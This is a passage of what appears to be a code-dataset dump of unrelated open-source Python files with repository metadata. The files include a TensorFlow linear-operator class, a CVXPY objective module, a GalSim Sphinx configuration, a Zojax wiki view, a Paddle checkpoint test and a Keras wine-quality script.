if j not in dic.keys():
dic[j]=1
l = dic.keys()
l.sort()
if l==['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']:
results.append(str(i*n))
break
input.close()
print len(results),results
out = open('out.txt','w')
for i in range(len(results)):
out.write('Case #'+str(i+1)+': '+results[i]+'\n')
| [
"[[email protected]]"
] | |
ac92c6cc494073720f64ded6d9dfce7c9f5e7603 | cc72013ede1b3bb02c32a3d0d199be4f7986c173 | /ch10/cballmaxheight.py | d1b7e7d7f8bd3735de66883c44cae85de31b5936 | [] | no_license | alextickle/zelle-exercises | b87d2a1476189954565f5cc97ee1448200eb00d4 | b784ff9ed9b2cb1c56e31c1c63f3e2b52fa37875 | refs/heads/master | 2021-01-19T00:33:19.132238 | 2017-09-14T23:35:35 | 2017-09-14T23:35:35 | 87,182,609 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 645 | py | from classProjectile import Projectile
def getInputs():
a = input("Enter the launch angle (in degrees): ")
v = input("Enter the initial velocity (in meters/sec): ")
h = input("Enter the initial height (in meters): ")
t = input("Enter the time initerval between position calculations: ")
return a, v, h, t
def main():
angle, vel, h0, time = getInputs()
cball = Projectile(angle, vel, h0)
maxheight = 0
while cball.getY() >= 0:
cball.update(time)
if cball.getY() > maxheight:
maxheight = cball.getY()
print "\nDistance traveled: %0.1f meters." % (cball.getX())
print "\nMaximum height: %0.1f meters." % (maxheight)
main()
| [
"[email protected]"
] | |
cacda09aaaef2e4170fc9593a18b9c06078c39cf | 2e7814885646a56ffd3db0883a1c3f790cb9de46 | /src/zojax/wiki/browser/wiki.py | 083aa26c9e5f90104938fd17f906a76c8a3f4019 | [
"ZPL-2.1"
] | permissive | Zojax/zojax.wiki_ | 1afa247c8797ac7316d6689d77d9c61a991eda0b | b0b9a3c3a91ffb725c5ef7e330632f18dab3d75e | refs/heads/master | 2020-04-01T15:33:32.556439 | 2014-01-29T18:31:29 | 2014-01-29T18:31:29 | 2,038,571 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,643 | py | ##############################################################################
#
# Copyright (c) 2009 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""
$Id$
"""
from zope import component, interface, event, schema
from zope.component import getUtility, getMultiAdapter, queryMultiAdapter
from zope.traversing.browser import absoluteURL
from zope.lifecycleevent import ObjectCreatedEvent
from zope.publisher.interfaces import NotFound
from zope.publisher.interfaces.browser import IBrowserPublisher
from zope.app.container.interfaces import INameChooser
from zojax.richtext.field import RichText
from zojax.content.actions.action import Action
from zojax.statusmessage.interfaces import IStatusMessage
from zojax.layoutform import interfaces, button, Fields, PageletForm
from zojax.wiki.format import generateWikiName
from zojax.wiki.interfaces import _, IWiki, IWikiPage
from zojax.wiki.wikipage import WikiPage
from zojax.wiki.browser.empty import EmptyWikiPage
from zojax.wiki.browser.wikipage import customWidget
from zojax.wiki.browser.interfaces import IManageWikiAction, IAddWikiPageAction
class WikiPublisher(object):
interface.implements(IBrowserPublisher)
component.adapts(IWiki, interface.Interface)
def __init__(self, context, request):
self.context = context
self.request = request
def publishTraverse(self, request, name):
context = self.context
if name in context:
return context[name]
view = queryMultiAdapter((context, request), name=name)
if view is not None:
return view
try:
if INameChooser(context).checkName(name, WikiPage()):
return EmptyWikiPage(name, context, request)
except:
pass
raise NotFound(self.context, name, request)
def browserDefault(self, request):
return self.context, ('FrontPage',)
class ManageWiki(Action):
component.adapts(IWikiPage, interface.Interface)
interface.implements(IManageWikiAction)
weight = 6
title = _(u'Manage Wiki')
contextInterface = IWiki
permission = 'zojax.ModifyContent'
@property
def url(self):
return '%s/context.html'%absoluteURL(self.context, self.request)
class AddWikiPageAction(Action):
component.adapts(IWikiPage, interface.Interface)
interface.implements(IAddWikiPageAction)
weight = 10
title = _(u'Add Wiki Page')
contextInterface = IWiki
permission = 'zojax.ModifyWikiContent'
@property
def url(self):
return '%s/addwikipage.html'%absoluteURL(self.context, self.request)
class IAddWikiPage(interface.Interface):
title = schema.TextLine(
title = _('Title'),
description = _('Wiki page title.'),
required = True)
text = RichText(
title = _(u'Page text'),
description = _(u'Wiki page text.'),
required = True)
class AddWikiPageForm(PageletForm):
label = _('Add Wiki Page')
fields = Fields(IAddWikiPage)
fields['text'].widgetFactory = customWidget
ignoreContext = True
@button.buttonAndHandler(_('Create'), name='create',
provides=interfaces.IAddButton)
def createHandler(self, action):
data, errors = self.extractData()
if errors:
IStatusMessage(self.request).add(
(self.formErrorsMessage,) + errors, 'formError')
else:
page = WikiPage(title=data['title'])
page.text = data['text']
event.notify(ObjectCreatedEvent(page))
name = generateWikiName(data['title'])
wiki = self.context
try:
wiki[name] = page
page.parent = wiki['FrontPage']
IStatusMessage(self.request).add(_('Wiki page has been added.'))
self.redirect(u'%s/'%name)
except Exception, err:
IStatusMessage(self.request).add(err, 'error')
@button.buttonAndHandler(_('Cancel'), name='cancel',
provides=interfaces.ICancelButton)
def cancelHandler(self, action):
self.redirect(u'./')
| [
"[email protected]"
] | |
e4841e48dd2798ed1c2ba400e9e3a8c6b9d95714 | cb73499c5b15cead88751dfca21cefae81483501 | /docs/conf.py | 6f333b8b3d818eebd843b06f85a9f8c9dc169e27 | [
"BSD-2-Clause",
"BSD-3-Clause"
] | permissive | RichardPflaum/GalSim | dcbabfbdbd41a0ebe909ad3c28e47daabcd92818 | 05060e583b2465ca8e2b258126c2ba8257e358f1 | refs/heads/main | 2023-03-23T05:59:05.349282 | 2021-02-05T23:11:55 | 2021-02-06T00:49:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,740 | py | # Copyright (c) 2012-2020 by the GalSim developers team on GitHub
# https://github.com/GalSim-developers
#
# This file is part of GalSim: The modular galaxy image simulation toolkit.
# https://github.com/GalSim-developers/GalSim
#
# GalSim is free software: redistribution and use in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions, and the disclaimer given in the accompanying LICENSE
# file.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the disclaimer given in the documentation
# and/or other materials provided with the distribution.
#
# -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# MJ: I find things work better if it's installed properly and you don't do this.
#
#import os
#import sys
#sys.path.insert(0, os.path.abspath('../galsim'))
# -- Project information -----------------------------------------------------
import galsim
import galsim.roman
import galsim.des
project = 'GalSim'
copyright = '2019, GalSim-developers'
author = 'GalSim-developers'
# The short X.Y version
version = '.'.join(map(str,galsim.__version_info__[:2]))
# The full version, including alpha/beta/rc tags
release = galsim.__version__
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.mathjax',
'sphinx.ext.viewcode',
'sphinx.ext.autosectionlabel',
'sphinx.ext.napoleon',
'sphinx.ext.coverage',
]
# Add any paths that contain templates here, relative to this directory.
#templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
#language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# The reST default role (used for this markup: `text`) to use for all
# documents.
default_role = 'any'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# https://michaelgoerz.net/notes/extending-sphinx-napoleon-docstring-sections.html
# -- Extensions to the Napoleon GoogleDocstring class ---------------------
from sphinx.ext.napoleon.docstring import GoogleDocstring
# first, we define new methods for any new sections and add them to the class
def parse_keys_section(self, section):
return self._format_fields('Keys', self._consume_fields())
GoogleDocstring._parse_keys_section = parse_keys_section
def parse_attributes_section(self, section):
return self._format_fields('Attributes', self._consume_fields())
GoogleDocstring._parse_attributes_section = parse_attributes_section
def parse_class_attributes_section(self, section):
return self._format_fields('Class Attributes', self._consume_fields())
GoogleDocstring._parse_class_attributes_section = parse_class_attributes_section
# we now patch the parse method to guarantee that the the above methods are
# assigned to the _section dict
def patched_parse(self):
self._sections['keys'] = self._parse_keys_section
self._sections['class attributes'] = self._parse_class_attributes_section
self._unpatched_parse()
GoogleDocstring._unpatched_parse = GoogleDocstring._parse
GoogleDocstring._parse = patched_parse
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'GalSimdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'GalSim.tex', 'GalSim Documentation',
'GalSim-developers', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'GalSim', 'GalSim Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'GalSim', 'GalSim Documentation',
author, 'GalSim', 'One line description of project.',
'Miscellaneous'),
]
# -- Options for Epub output -------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# -- Extension configuration -------------------------------------------------
| [
"[email protected]"
] | |
16a3ede80cdb02e339d6e3f2cf8311c8b6990ec5 | 0d1c1a216b01f6773e751691e9d3e10cc4f27d09 | /tensorflow/contrib/linalg/python/ops/linear_operator_composition.py | a6c9c30d04180656eb136b6fcb82585b77f3b584 | [
"Apache-2.0"
] | permissive | abdo5520/tensorflow | 13c1496e7aa115bba06cda5fc9dc73ba9e4b1694 | 55b01593515817992821423fec19733bca91c918 | refs/heads/master | 2021-01-13T04:05:38.763884 | 2017-01-01T13:10:05 | 2017-01-01T13:10:05 | 77,894,045 | 0 | 1 | null | 2017-01-03T07:28:02 | 2017-01-03T07:28:02 | null | UTF-8 | Python | false | false | 9,894 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Composes one or more `LinearOperators`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.linalg.python.ops import linear_operator
from tensorflow.python.framework import common_shapes
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
__all__ = ["LinearOperatorComposition"]
class LinearOperatorComposition(linear_operator.LinearOperator):
"""Composes one or more `LinearOperators`.
This operator composes one or more linear operators `[op1,...,opJ]`,
building a new `LinearOperator` with action defined by:
```
op_composed(x) := op1(op2(...(opJ(x)...))
```
If `opj` acts like [batch] matrix `Aj`, then `op_composed` acts like the
[batch] matrix formed with the multiplication `A1 A2...AJ`.
If `opj` has shape `batch_shape_j + [M_j, N_j]`, then we must have
`N_j = M_{j+1}`, in which case the composed operator has shape equal to
`broadcast_batch_shape + [M_1, N_J]`, where `broadcast_batch_shape` is the
mutual broadcast of `batch_shape_j`, `j = 1,...,J`, assuming the intermediate
batch shapes broadcast. Even if the composed shape is well defined, the
composed operator's methods may fail due to lack of broadcasting ability in
the defining operators' methods.
```python
# Create a 2 x 2 linear operator composed of two 2 x 2 operators.
operator_1 = LinearOperatorMatrix([[1., 2.], [3., 4.]])
operator_2 = LinearOperatorMatrix([[1., 0.], [0., 1.]])
operator = LinearOperatorComposition([operator_1, operator_2])
operator.to_dense()
==> [[1., 2.]
[3., 4.]]
operator.shape
==> [2, 2]
operator.log_determinant()
==> scalar Tensor
x = ... Shape [2, 4] Tensor
operator.apply(x)
==> Shape [2, 4] Tensor
# Create a [2, 3] batch of 4 x 5 linear operators.
matrix_45 = tf.random_normal(shape=[2, 3, 4, 5])
operator_45 = LinearOperatorMatrix(matrix)
# Create a [2, 3] batch of 5 x 6 linear operators.
matrix_56 = tf.random_normal(shape=[2, 3, 5, 6])
operator_56 = LinearOperatorMatrix(matrix_56)
# Compose to create a [2, 3] batch of 4 x 6 operators.
opeartor_46 = LinearOperatorComposition([operator_45, operator_56])
# Create a shape [2, 3, 6, 2] vector.
x = tf.random_normal(shape=[2, 3, 6, 2])
operator.apply(x)
==> Shape [2, 3, 4, 2] Tensor
```
#### Performance
The performance of `LinearOperatorComposition` on any operation is equal to
the sum of the individual operators' operations.
#### Matrix property hints
This `LinearOperator` is initialized with boolean flags of the form `is_X`,
for `X = non_singular, self_adjoint, positive_definite`.
These have the following meaning
* If `is_X == True`, callers should expect the operator to have the
property `X`. This is a promise that should be fulfilled, but is *not* a
runtime assert. For example, finite floating point precision may result
in these promises being violated.
* If `is_X == False`, callers should expect the operator to not have `X`.
* If `is_X == None` (the default), callers should have no expectation either
way.
"""
def __init__(self,
operators,
is_non_singular=None,
is_self_adjoint=None,
is_positive_definite=None,
name=None):
"""Initialize a `LinearOperatorComposition`.
`LinearOperatorComposition` is initialized with a list of operators
`[op_1,...,op_J]`. For the `apply` method to be well defined, the
composition `op_i.apply(op_{i+1}(x))` must be defined. Other methods have
similar constraints.
Args:
operators: Iterable of `LinearOperator` objects, each with
the same `dtype` and composible shape.
is_non_singular: Expect that this operator is non-singular.
is_self_adjoint: Expect that this operator is equal to its hermitian
transpose.
is_positive_definite: Expect that this operator is positive definite,
meaning the real part of all eigenvalues is positive. We do not require
the operator to be self-adjoint to be positive-definite. See:
https://en.wikipedia.org/wiki/Positive-definite_matrix
#Extension_for_non_symmetric_matrices
name: A name for this `LinearOperator`. Default is the individual
operators names joined with `_o_`.
Raises:
TypeError: If all operators do not have the same `dtype`.
ValueError: If `operators` is empty.
"""
# Validate operators.
check_ops.assert_proper_iterable(operators)
operators = list(operators)
if not operators:
raise ValueError(
"Expected a non-empty list of operators. Found: %s" % operators)
self._operators = operators
# Validate dtype.
dtype = operators[0].dtype
for operator in operators:
if operator.dtype != dtype:
name_type = (str((o.name, o.dtype)) for o in operators)
raise TypeError(
"Expected all operators to have the same dtype. Found %s"
% " ".join(name_type))
# Auto-set and check hints.
if all(operator.is_non_singular for operator in operators):
if is_non_singular is False:
raise ValueError(
"The composition of non-singular operators is always non-singular.")
is_non_singular = True
# Initialization.
graph_parents = []
for operator in operators:
graph_parents.extend(operator.graph_parents)
if name is None:
name = "_o_".join(operator.name for operator in operators)
with ops.name_scope(name, values=graph_parents):
super(LinearOperatorComposition, self).__init__(
dtype=dtype,
graph_parents=graph_parents,
is_non_singular=is_non_singular,
is_self_adjoint=is_self_adjoint,
is_positive_definite=is_positive_definite,
name=name)
@property
def operators(self):
return self._operators
def _shape(self):
# Get final matrix shape.
domain_dimension = self.operators[0].domain_dimension
for operator in self.operators[1:]:
domain_dimension.assert_is_compatible_with(operator.range_dimension)
domain_dimension = operator.domain_dimension
matrix_shape = tensor_shape.TensorShape(
[self.operators[0].range_dimension,
self.operators[-1].domain_dimension])
# Get broadcast batch shape.
# broadcast_shape checks for compatibility.
batch_shape = self.operators[0].batch_shape
for operator in self.operators[1:]:
batch_shape = common_shapes.broadcast_shape(
batch_shape, operator.batch_shape)
return batch_shape.concatenate(matrix_shape)
def _shape_dynamic(self):
# Avoid messy broadcasting if possible.
if self.shape.is_fully_defined():
return ops.convert_to_tensor(
self.shape.as_list(), dtype=dtypes.int32, name="shape")
# Don't check the matrix dimensions. That would add unnecessary Asserts to
# the graph. Things will fail at runtime naturally if shapes are
# incompatible.
matrix_shape = array_ops.stack([
self.operators[0].range_dimension_dynamic(),
self.operators[-1].domain_dimension_dynamic()
])
# Dummy Tensor of zeros. Will never be materialized.
zeros = array_ops.zeros(shape=self.operators[0].batch_shape_dynamic())
for operator in self.operators[1:]:
zeros += array_ops.zeros(shape=operator.batch_shape_dynamic())
batch_shape = array_ops.shape(zeros)
return array_ops.concat_v2((batch_shape, matrix_shape), 0)
def _apply(self, x, adjoint=False):
# If self.operators = [A, B], and not adjoint, then
# apply_order_list = [B, A].
# As a result, we return A.apply(B.apply(x))
if adjoint:
apply_order_list = self.operators
else:
apply_order_list = list(reversed(self.operators))
result = x
for operator in apply_order_list:
result = operator.apply(result, adjoint=adjoint)
return result
def _determinant(self):
result = self.operators[0].determinant()
for operator in self.operators[1:]:
result *= operator.determinant()
return result
def _log_abs_determinant(self):
result = self.operators[0].log_abs_determinant()
for operator in self.operators[1:]:
result += operator.log_abs_determinant()
return result
def _solve(self, rhs, adjoint=False):
# TODO(langmore) Implement solve using solve_ls if some intermediate
# operator maps to a high dimensional space.
# In that case, an exact solve may still be possible.
# If self.operators = [A, B], and not adjoint, then
# solve_order_list = [A, B].
# As a result, we return B.solve(A.solve(x))
if adjoint:
solve_order_list = list(reversed(self.operators))
else:
solve_order_list = self.operators
solution = rhs
for operator in solve_order_list:
solution = operator.solve(solution, adjoint=adjoint)
return solution
def _add_to_tensor(self, x):
return self.to_dense() + x
| [
"[email protected]"
] | |
957b6dfafdf01768a405f18e1263f60e635d7d82 | 209c876b1e248fd67bd156a137d961a6610f93c7 | /python/paddle/fluid/tests/unittests/collective/fleet/test_auto_checkpoint1.py | 2db7b1e8f80682670d2ed4cf48d6df45479f95a9 | [
"Apache-2.0"
] | permissive | Qengineering/Paddle | 36e0dba37d29146ebef4fba869490ecedbf4294e | 591456c69b76ee96d04b7d15dca6bb8080301f21 | refs/heads/develop | 2023-01-24T12:40:04.551345 | 2022-10-06T10:30:56 | 2022-10-06T10:30:56 | 544,837,444 | 0 | 0 | Apache-2.0 | 2022-10-03T10:12:54 | 2022-10-03T10:12:54 | null | UTF-8 | Python | false | false | 1,771 | py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import paddle
import os
from paddle.fluid.tests.unittests.auto_checkpoint_utils import get_logger
from test_auto_checkpoint import AutoCheckPointACLBase
paddle.enable_static()
logger = get_logger()
class AutoCheckpointTest1(AutoCheckPointACLBase):
def setUp(self):
get_logger()
logger.info("enter tests")
self._old_environ = dict(os.environ)
proc_env = {
"PADDLE_RUNNING_ENV": "PADDLE_EDL_AUTO_CHECKPOINT",
"PADDLE_TRAINER_ID": "0",
"PADDLE_RUNNING_PLATFORM": "PADDLE_CLOUD",
"PADDLE_JOB_ID": "test_job_auto_1",
"PADDLE_EDL_HDFS_HOME": "/usr/local/hadoop-2.7.7",
"PADDLE_EDL_HDFS_NAME": "",
"PADDLE_EDL_HDFS_UGI": "",
"PADDLE_EDL_HDFS_CHECKPOINT_PATH": "auto_checkpoint_1",
"PADDLE_EDL_ONLY_FOR_CE_TEST": "1",
"PADDLE_EDL_FS_CACHE": ".auto_checkpoint_test_1",
"PADDLE_EDL_SAVE_CHECKPOINT_INTER": "0"
}
os.environ.update(proc_env)
def test_corner_epoch_no(self):
self._test_corner_epoch_no(0)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
d3336030c75230312fe64f70d821674c7b8b0832 | 744096e063ffb4cdb017f60e6dfae410a51c789a | /ml/m08_wine2_keras.py | 06ebe62cf59103482d4d188d56d1958c5811a866 | [] | no_license | elf0508/Study-bit | 59ddab507b02c13a45913c05a4799ff946e63f95 | a773d7643cbb1c0008e7ea01c32615c9e6e3678c | refs/heads/master | 2022-12-31T11:53:44.344693 | 2020-10-16T09:04:01 | 2020-10-16T09:04:01 | 270,950,252 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,792 | py | # keras 로 만들기
# 다중분류
import numpy as np
import pandas as pd
from keras.models import Sequential, Input
from keras.layers import Dense, Dropout
from keras.callbacks import EarlyStopping
from sklearn.svm import SVC
from sklearn.ensemble import RandomForestClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler, MinMaxScaler
from sklearn.preprocessing import MaxAbsScaler, RobustScaler
from sklearn.decomposition import PCA
from keras.utils import np_utils
ss = StandardScaler()
mms = MinMaxScaler()
mas = MaxAbsScaler()
rs = RobustScaler()
es = EarlyStopping(monitor = 'loss', mode = 'min', patience = 10)
pca = PCA(n_components = 10)
### 1. 데이터
wine = pd.read_csv('./data/csv/winequality-white.csv',
header = 0, index_col = None,
sep = ';', encoding = 'cp949')
print(wine.head())
print(wine.tail())
print(wine.shape) # (4898, 12)
## 1-1. 데이터 전처리
# 1-1-1. 결측치 확인
print(wine.isna()) # 확인 ok
## 1-2. numpy 파일로 변환 후 저장
wine = wine.values
print(type(wine)) # <class 'numpy.ndarray'>
print(wine)
print(wine.shape) # (4898, 12)
np.save('./data/wine_np.npy', arr = wine)
## 1-3. numpy 파일 불러오기
np.load('./data/wine_np.npy')
print(wine.shape) # (4898, 12)
## 1-4. 데이터 나누기
x = wine[:, :11]
y = wine[:, -1:]
print(x.shape) # (4898, 11)
print(y.shape) # (4898, 1)
## 1-5. train_test_split
x_train, x_test, y_train, y_test = train_test_split(
x, y, test_size = 0.25)
print(x_train.shape) # (3673, 11)
print(x_test.shape) # (1225, 11)
print(y_train.shape) # (3673, 1)
print(y_test.shape) # (1225, 1)
## 1-6. 원핫인코딩
y_train = np_utils.to_categorical(y_train)
y_test = np_utils.to_categorical(y_test)
print(y_train.shape) # (3673, 10)
print(y_test.shape) # (1225, 10)
## 1-7. 데이터 Scaling
rs.fit(x_train)
x_train = rs.transform(x_train)
x_test = rs.transform(x_test)
print(x_train[0]) # [0.33653846 0.21621622 0.25903614 0.01687117 0.24315068 0.12543554
# 0.31888112 0.06499518 0.41666667 0.23255814 0.77419355]
print(x_test[1]) # [0.40384615 0.10810811 0.29518072 0.01840491 0.17808219 0.04878049
# 0.38041958 0.13635487 0.4537037 0.30232558 0.32258065]
## 1-8. PCA
pca.fit(x_train)
x_train = pca.transform(x_train)
x_test = pca.transform(x_test)
print(x_train.shape) # (3673, 8)
print(x_test.shape) # (1225, 8)
# 2. 모델링
model = Sequential()
model.add(Dense(10, input_shape = (10, ), activation = 'relu'))
model.add(Dense(10))
model.add(Dense(10, activation = 'softmax'))
model.summary()
# 3. 모델 훈련
model.compile(loss = 'categorical_crossentropy', optimizer = 'adam', metrics = ['acc'])
model.fit(x_train, y_train, epochs = 10, batch_size = 32)
# 4. 모델 평가
res = model.evaluate(x_test, y_test)
print("loss : ", res[1]) # 0.5395918488502502
print("acc : ", res[1]) # 0.5395918488502502
'''
import pandas as pd
import numpy as np
from keras.models import Sequential
from keras.layers import Dense
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import accuracy_score
wine = pd.read_csv('winequality-white.csv',sep=';')
x = np.array(wine.iloc[:,0:-1])
y = np.array(wine.iloc[:,-1])
scaler = StandardScaler()
scaler.fit(x)
x = scaler.transform(x)
from sklearn.preprocessing import OneHotEncoder
y = y.reshape(-1,1)
aaa = OneHotEncoder()
aaa.fit(y)
y = aaa.transform(y).toarray()
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test, = train_test_split(
x, y, random_state=66, test_size=0.2 )
print(x_train.shape)
print(y_train.shape)
model = Sequential()
model.add(Dense(30, input_dim=11 ))
model.add(Dense(40))
model.add(Dense(120))
model.add(Dense(500,activation='relu'))
model.add(Dense(60))
model.add(Dense(32,activation='relu'))
model.add(Dense(7, activation='softmax'))
model.summary()
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc'])
model.fit(x_train, y_train, epochs=300, batch_size=10, validation_split=0.2)
loss, acc = model.evaluate(x_test,y_test)
print('keras의 acc는',acc)
# score = model.score(x_test,y_test) 이건 아마 mL model에 들어있는거니까 없다고 인식하게찌?
# print('score는',score)
# print(np.argmax(a, axis = 1)+1)
'''
| [
"[email protected]"
] | |
d15dd199e6c86808b473f526e605111671f36034 | e11dff811ca981f428644fd70d10a7369c671bcb | /src/tools/ecos/cvxpy/cvxpy/problems/objective.py | 13293559446a04fad84799c55d14674f9eada4e7 | [
"GPL-3.0-only",
"GPL-3.0-or-later",
"MIT"
] | permissive | riadnassiffe/Simulator | 3c4a036b5635534929fdb04b0e9c96d64c0da71f | 7d9ff09f26367d3714e3d10be3dd4a9817b8ed6b | refs/heads/master | 2021-06-20T09:31:36.033427 | 2021-04-17T00:03:17 | 2021-04-17T00:03:17 | 16,033,879 | 0 | 0 | MIT | 2021-03-22T23:20:34 | 2014-01-18T20:58:10 | Jupyter Notebook | UTF-8 | Python | false | false | 2,758 | py | """
Copyright 2013 Steven Diamond
This file is part of CVXPY.
CVXPY is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
CVXPY is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with CVXPY. If not, see <http://www.gnu.org/licenses/>.
"""
import cvxpy.utilities as u
from cvxpy.expressions.expression import Expression
import cvxpy.lin_ops.lin_utils as lu
class Minimize(u.Canonical):
"""An optimization objective for minimization.
"""
NAME = "minimize"
def __init__(self, expr):
self._expr = Expression.cast_to_const(expr)
# Validate that the objective resolves to a scalar.
if self._expr.size != (1, 1):
raise Exception("The '%s' objective must resolve to a scalar."
% self.NAME)
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, repr(self._expr))
def __str__(self):
return ' '.join([self.NAME, self._expr.name()])
def canonicalize(self):
"""Pass on the target expression's objective and constraints.
"""
return self._expr.canonical_form
def variables(self):
"""Returns the variables in the objective.
"""
return self._expr.variables()
def parameters(self):
"""Returns the parameters in the objective.
"""
return self._expr.parameters()
def is_dcp(self):
"""The objective must be convex.
"""
return self._expr.is_convex()
@property
def value(self):
"""The value of the objective expression.
"""
return self._expr.value
@staticmethod
def primal_to_result(result):
"""The value of the objective given the solver primal value.
"""
return result
class Maximize(Minimize):
"""An optimization objective for maximization.
"""
NAME = "maximize"
def canonicalize(self):
"""Negates the target expression's objective.
"""
obj, constraints = super(Maximize, self).canonicalize()
return (lu.neg_expr(obj), constraints)
def is_dcp(self):
"""The objective must be concave.
"""
return self._expr.is_concave()
@staticmethod
def primal_to_result(result):
"""The value of the objective given the solver primal value.
"""
return -result
| [
"[email protected]"
] | |
76faca35f33e12cea802b44068cb8aa14880293c | e0980f704a573894350e285f66f4cf390837238e | /.history/menus/models_20201030115229.py | fe2fb42e539b2ceeceff986fda84db20415ecd35 | [] | no_license | rucpata/WagtailWebsite | 28008474ec779d12ef43bceb61827168274a8b61 | 5aa44f51592f49c9a708fc5515ad877c6a29dfd9 | refs/heads/main | 2023-02-09T15:30:02.133415 | 2021-01-05T14:55:45 | 2021-01-05T14:55:45 | 303,961,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 670 | py | from django.db import models
from django_extensions.db.fields import AutoSlugField
from modelcluster.models import ClusterableModel
